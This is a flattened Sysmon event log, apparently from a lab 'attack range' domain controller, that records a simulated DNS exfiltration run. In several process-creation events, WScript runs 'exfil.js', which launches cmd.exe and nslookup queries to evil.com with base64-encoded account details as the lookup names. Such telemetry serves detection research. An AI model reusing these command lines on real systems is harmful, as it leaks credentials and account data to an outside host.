14:21:36.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5B44-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.560{2E1864BB-18F0-629A-5944-000000005F02}51528076C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-5B44-000000005F02}2568C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.562{2E1864BB-18F0-629A-5B44-000000005F02}2568C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5944-000000005F02}5152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoxb.tmp 2>&1 10341000x8000000000000000210724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.529{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5A44-000000005F02}5976C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.529{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5A44-000000005F02}5976C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.529{2E1864BB-18F0-629A-5A44-000000005F02}59764296C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5944-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.513{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5A44-000000005F02}5976C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5944-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-18E0-629A-6742-000000005F02}39767732C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5944-000000005F02}5152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.495{2E1864BB-18F0-629A-5944-000000005F02}5152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoxb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.482{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqnkc.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.460{2E1864BB-18F0-629A-5744-000000005F02}80327648C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5844-000000005F02}1216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.444{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5844-000000005F02}1216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.444{2E1864BB-18F0-629A-5644-000000005F02}26927144C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-5844-000000005F02}1216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.458{2E1864BB-18F0-629A-5844-000000005F02}1216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5644-000000005F02}2692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqnkc.tmp 2>&1 354300x8000000000000000210704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.812{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50830- 354300x8000000000000000210703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.812{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-50830-false127.0.0.1-53domain 354300x8000000000000000210702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50829- 354300x8000000000000000210701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-50829-false127.0.0.1-53domain 354300x8000000000000000210700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-50828-false127.0.0.1-53domain 354300x8000000000000000210699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50828- 354300x8000000000000000210698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.811{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-50828-false127.0.0.1-53domain 10341000x8000000000000000210697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.429{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5744-000000005F02}8032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.429{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5744-000000005F02}8032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.429{2E1864BB-18F0-629A-5744-000000005F02}80327648C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5644-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.413{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5744-000000005F02}8032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 